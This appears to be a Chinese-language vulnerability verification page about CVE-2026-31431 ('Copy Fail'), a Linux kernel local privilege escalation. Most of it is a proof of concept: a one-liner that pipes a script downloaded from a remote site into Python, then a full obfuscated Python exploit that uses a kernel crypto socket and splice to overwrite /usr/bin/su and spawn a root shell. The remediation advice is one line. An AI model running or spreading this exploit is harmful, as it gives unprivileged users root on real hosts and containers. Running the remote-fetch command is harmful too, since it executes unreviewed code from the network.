漏洞验证-CVE-2026-31431 Linux 内核 Copy Fail 本地提权漏洞

一、漏洞描述

2026年4月29日，安全研究团队公开披露了一个潜伏近十年的 Linux 内核高危本地提权漏洞，漏洞编号为CVE-2026-31431，代号Copy Fail。

该漏洞无需复杂条件、无竞态、兼容性极强，普通用户仅凭一段 732 字节 Python 脚本，就能直接提升至 root 权限，还可实现容器逃逸、对多用户主机、容器集群、CI/CD 环境威胁极大，堪称近年最危险的 Linux 内核漏洞之一。

二、漏洞POC

1、curl https://copy.fail/exp | python && su

2、python3  copy_fail_exp.py

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

 

三、漏洞验证

四、修复建议

升级内核至最新版本